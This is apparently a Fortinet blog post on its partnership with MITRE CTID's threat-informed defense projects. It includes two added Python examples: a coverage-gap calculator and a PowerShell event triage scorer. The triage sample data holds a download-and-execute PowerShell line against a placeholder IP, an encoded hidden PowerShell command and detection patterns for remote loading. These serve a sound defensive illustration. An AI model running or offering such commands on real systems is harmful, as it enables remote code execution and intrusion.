The MITRE Center for Threat-Informed Defense (CTID) has released its latest impact report at a pivotal moment for cybersecurity. Defenders no longer face isolated attacks, tools, or control gaps. They face adaptive adversaries that operate across multiple domains: cloud environments, identity systems, endpoints, applications, infrastructure, and increasingly AI-driven workflows.
Security teams need actionable methods that connect adversary behavior to detection engineering, control validation, vulnerability prioritization, cloud security, and overall security program development.
Fortinet's partnership with MITRE CTID supports that goal. CTID is a nonprofit R&D consortium operated by MITRE, and its research is made publicly available for the benefit of defenders worldwide. Its 2025 impact report reflects the scale of that mission: from CTID's launch in 2019 through its 2025 projects, more than 1,100 researchers from 38 countries across five continents and more than 50 participating organizations have contributed to 52 R&D projects.
Fortinet is proud to be part of that work as a CTID Research Partner. Through this collaboration, Fortinet contributes threat intelligence, security research, operational expertise, and a defender-focused perspective to projects that enhance practical, scalable, and accessible threat-informed defense.
The significance of CTID extends beyond the research it produces. Its real value lies in bringing together security practitioners, researchers, vendors, financial institutions, healthcare organizations, technology firms, and nonprofits to address challenges that no single organization can solve as efficiently alone.
Threat-informed defense relies on a shared understanding. MITRE ATT&CK offers defenders a common language for describing adversary behavior. Building on that, CTID provides practical resources that assist organizations in applying this language to real security decisions: identifying which detections to enhance, controls to validate, vulnerabilities to prioritize, and program gaps to address first.
For Fortinet, this closely aligns with our cybersecurity philosophy. Defenders require unified visibility, threat intelligence, automation, and security controls that work together. They also need frameworks that connect these capabilities to the adversary behaviors targeted by these controls.
Cloud environments are often secured using checklists, best practices, and control frameworks. While such tools are useful, they can also leave teams asking a basic question: How do these controls map to real adversary behavior?
The Threat-Informed Defense for Cloud Security project helps answer that question by mapping the Cloud Security Alliance’s (CSA) Cloud Controls Matrix v4.1 to MITRE ATT&CK. Fortinet's contribution to this project sharpens how organizations can make cloud security decisions based on real-world attack data rather than assumptions.
For defenders, establishing that connection is crucial. It lets cloud security teams determine which controls address specific adversary behaviors, identify where coverage is solid, and spot where further investment is needed. It also moves cloud security beyond merely meeting compliance requirements toward an operational approach that reduces risk and verifies that defenses actually work.
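The coverage question in the paragraph above (which prioritized behaviors does a control set address, which are uncovered, and which rest on a single control) can be answered mechanically once a control-to-technique mapping exists. The script below is an added example, not code from the project or from the page's author. The control IDs only imitate the CCM domain-number naming style, the technique IDs are real ATT&CK IDs, and the control-to-technique pairs and the threat profile are constructed for illustration; they are not the project's published mapping.

```python
from collections import defaultdict

# Constructed mapping of control IDs to the ATT&CK technique IDs they address.
# Control IDs imitate the CCM "DOMAIN-NN" style; the pairings are illustrative
# and are NOT the project's published mapping.
CONTROL_TO_TECHNIQUES = {
    "IAM-03": {"T1078", "T1110"},  # strong / multi-factor authentication
    "IAM-08": {"T1078", "T1098"},  # periodic access review
    "LOG-05": {"T1562", "T1098"},  # audit log monitoring and response
    "DSP-10": {"T1530"},           # protection of sensitive data at rest
    "CEK-03": {"T1552"},           # key and secret management
}

# Constructed threat profile: techniques the team prioritized from intelligence
# about adversaries targeting its cloud estate.
PRIORITY_TECHNIQUES = ["T1078", "T1098", "T1110", "T1136", "T1190", "T1530", "T1552"]


def invert(mapping):
    """Return technique -> set of controls that address it."""
    tech_to_controls = defaultdict(set)
    for control, techniques in mapping.items():
        for technique in techniques:
            tech_to_controls[technique].add(control)
    return tech_to_controls


def coverage_report(mapping, priority):
    """Split prioritized techniques into covered, uncovered and single-control.

    A technique that only one control addresses is a single point of failure:
    if that control is misconfigured, the behavior is effectively unaddressed.
    """
    tech_to_controls = invert(mapping)
    covered = {t: sorted(tech_to_controls[t]) for t in priority if t in tech_to_controls}
    uncovered = sorted(t for t in priority if t not in tech_to_controls)
    single_control = sorted(t for t, controls in covered.items() if len(controls) == 1)
    return {"covered": covered, "uncovered": uncovered, "single_control": single_control}


def rank_controls(mapping, priority):
    """Order controls by how many prioritized techniques each one addresses.

    Controls that address several prioritized behaviors are the ones whose
    validation (or failure) matters most.
    """
    wanted = set(priority)
    counts = {control: len(techniques & wanted) for control, techniques in mapping.items()}
    return sorted(counts.items(), key=lambda item: (-item[1], item[0]))


if __name__ == "__main__":
    report = coverage_report(CONTROL_TO_TECHNIQUES, PRIORITY_TECHNIQUES)
    print("covered:", report["covered"])
    print("uncovered (investment gaps):", report["uncovered"])
    print("single point of coverage:", report["single_control"])
    print("controls ranked by prioritized techniques addressed:",
          rank_controls(CONTROL_TO_TECHNIQUES, PRIORITY_TECHNIQUES))
```

Run stand-alone, the report flags T1136 and T1190 as prioritized behaviors no control in this constructed set addresses, and T1110, T1530 and T1552 as behaviors resting on a single control. Replacing the two constructed dictionaries with a real mapping export and the organization's own threat profile turns this into a repeatable gap check rather than a compliance checklist.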
Threat-informed defense is both a technical discipline and a program-level approach. Organizations must assess the maturity of their security initiatives across cyberthreat intelligence, defensive strategies, and testing and evaluation.
MITRE INFORM gives organizations a structured framework to evaluate and improve their threat-informed posture. As a project research partner, Fortinet helps security leaders determine where to direct investments and how to advance program maturity.
This matters most for leaders who must connect technical security efforts to business decisions. INFORM moves teams from claiming threat-informed defense to measuring it, with clear visibility into strengths, gaps, and where to improve next.
Modern attackers increasingly use tradecraft that is hard to distinguish from normal activity. Living-off-the-land binaries, legitimate administrative tools, scripted actions, and identity-based lateral movement all generate signals that look harmless in isolation. That ambiguity adds noise for defenders and gives adversaries room to operate.
The Ambiguous Techniques project addresses that problem by applying contextual analysis to ATT&CK techniques to help determine malicious intent behind seemingly benign behavior. Fortinet is a project research partner, and as I noted in the CTID impact report: “Modern adversaries deliberately operate in the gray space between benign behavior and malicious action, making advanced analysis of ATT&CK patterns an operational necessity, not a research luxury.”
This is where threat-informed defense proves particularly effective. The aim is not merely to detect more but to improve detection quality. Context turns a suspicious event into a defensible conclusion, letting analysts lower false positives and concentrate on the activity that matters most.
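To make the point about context concrete, the script below is an added example (not code from the CTID project or from the page's author) that scores process-creation events which a raw signature has already tagged as PowerShell execution (ATT&CK T1059.001). The same technique is treated differently depending on who ran it, from where, what spawned it and how the command line looks. The event schema, the scoring weights and thresholds, the lists of expected admin accounts and management hosts, and the four sample events are all constructed for illustration and are not the project's methodology.

```python
import re
from dataclasses import dataclass


# Assumed event schema (constructed for this example): one process-creation
# record that a raw detection already tagged with the ATT&CK technique it matched.
@dataclass
class Event:
    host: str
    user: str
    parent: str     # parent process image name
    image: str      # spawned process image name
    cmdline: str
    hour: int       # local hour (0-23) of execution
    technique: str  # e.g. "T1059.001" (PowerShell)


# Constructed environment context. In practice this comes from the CMDB, the
# identity provider and the endpoint inventory, not from the event itself.
ADMIN_USERS = {"svc_sccm", "ops.admin"}
MGMT_HOSTS = {"mgmt01"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe"}
ENCODED_FLAGS = {"-e", "-ec", "-enc", "-encodedcommand"}
REMOTE_LOAD = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biex\b", re.I)


def score(event):
    """Weigh the context around an ambiguous technique; return (score, reasons).

    Weights are illustrative. Each factor alone is benign in many environments;
    it is the combination that separates admin activity from an intrusion.
    """
    total, reasons = 0, []
    if event.parent.lower() in OFFICE_PARENTS:
        total += 40
        reasons.append("spawned by an Office application")
    if any(token.lower() in ENCODED_FLAGS for token in event.cmdline.split()):
        total += 25
        reasons.append("encoded command line")
    if REMOTE_LOAD.search(event.cmdline):
        total += 25
        reasons.append("fetches and runs remote content")
    if event.user not in ADMIN_USERS:
        total += 15
        reasons.append("account is not an expected admin")
    if event.host not in MGMT_HOSTS:
        total += 10
        reasons.append("host is not a management system")
    if event.hour < 6 or event.hour >= 22:
        total += 10
        reasons.append("outside business hours")
    return total, reasons


def verdict(total):
    """Map a context score to an analyst action (thresholds are illustrative)."""
    if total >= 60:
        return "escalate"
    if total >= 30:
        return "review"
    return "suppress"


def triage(events):
    """Return (host, score, verdict) for each event so results can be checked."""
    results = []
    for event in events:
        total, _ = score(event)
        results.append((event.host, total, verdict(total)))
    return results


# Constructed sample events; the base64 and the 198.51.100.5 address are placeholders.
SAMPLE_EVENTS = [
    Event("mgmt01", "svc_sccm", "ccmexec.exe", "powershell.exe",
          r"powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\sccm\inventory.ps1",
          10, "T1059.001"),
    Event("ws-fin-07", "j.doe", "winword.exe", "powershell.exe",
          "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
          14, "T1059.001"),
    Event("ws-fin-07", "j.doe", "explorer.exe", "powershell.exe",
          r"powershell.exe Get-ChildItem C:\Users\j.doe\Documents",
          11, "T1059.001"),
    Event("mgmt01", "ops.admin", "cmd.exe", "powershell.exe",
          "powershell.exe -nop -c IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.5/a.ps1')",
          3, "T1059.001"),
]


if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        total, reasons = score(event)
        print(f"{event.host:10} {event.user:10} {total:3} {verdict(total):9} {'; '.join(reasons)}")
```

All four events match the same technique, yet the software-deployment account running a scheduled script on the management host is suppressed, the finance workstation where Word spawned an encoded PowerShell is escalated, and the administrator pulling a remote script at 03:00 lands in review: admin context lowers the score but does not erase the remote-load and off-hours signals. The reasons list is what makes the conclusion defensible to whoever picks up the alert.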
Although individual ATT&CK techniques are useful, attackers seldom use them in isolation. Instead, they chain actions: gaining access, escalating privileges, evading detection, moving laterally, and working toward their objectives over time.
Attack Flow v3 enables defenders to document, visualize, and communicate chains of adversary behavior. As a project research partner, Fortinet contributed to a release that sharpens how teams build and present flows, with new visualization capabilities that surface patterns more quickly.
For security teams, this puts threat-informed defense into practice across stakeholder levels. Analysts use flows to understand adversary behavior in depth. Detection engineers identify coverage gaps. Leaders see directly how defensive measures align with real attack paths.
“Fortinet brings both depth and genuine commitment to the work we do together at the center. Their involvement across multiple CTID research initiatives reflects how a global security leader operationalizes threat-informed defense rather than just endorsing it. That kind of hands-on contribution is what moves the practice forward for defenders everywhere,” says Leslie Z. Anderson, chief cyber strategist and head of threat-informed defense programs, MITRE.
The CTID impact report also outlines the future of threat-informed defense. Its 2026 R&D roadmap focuses on helping defenders operationalize adversary behavior at scale, covering areas such as detection strength, insider threat mitigation, security capability mapping, program maturity, fraud prevention, attack flow, and AI security.
This direction aligns with the challenges security teams face. Today’s defenders need research that is practical enough to use, adaptable across different settings, and accessible to the larger community. Additionally, they need methods to combine intelligence, controls, detection, testing, and strategic decisions into a unified security strategy.
Fortinet’s collaboration with CTID aligns with this goal. It also enhances our broader effort to improve security outcomes through an integrated technology strategy, AI-enhanced operations, FortiGuard Labs threat intelligence, and advanced security features that span networks, endpoints, cloud environments, applications, and user protection.
Fortinet’s collaboration with MITRE CTID reflects a shared belief that effective cyber defense must be grounded in how adversaries actually operate. That is the real value of the relationship. It is not collaboration for its own sake.
As attackers become more adaptive, automated, and distributed, defenders need practical frameworks that translate threat intelligence into action. They need ways to evaluate controls against real-world techniques, strengthen cloud defenses, improve detection quality, and mature their security programs over time.
MITRE CTID’s work helps provide that foundation. Fortinet’s participation brings operational security expertise, threat intelligence, and a defender-focused perspective to research that benefits the broader community.
The collaboration between the organizations is designed to help defenders move faster, make better decisions, and change the game against our common adversary.
Learn more about Fortinet’s commitment to its collaboration with esteemed organizations from both the public and private sectors, including MITRE CTID.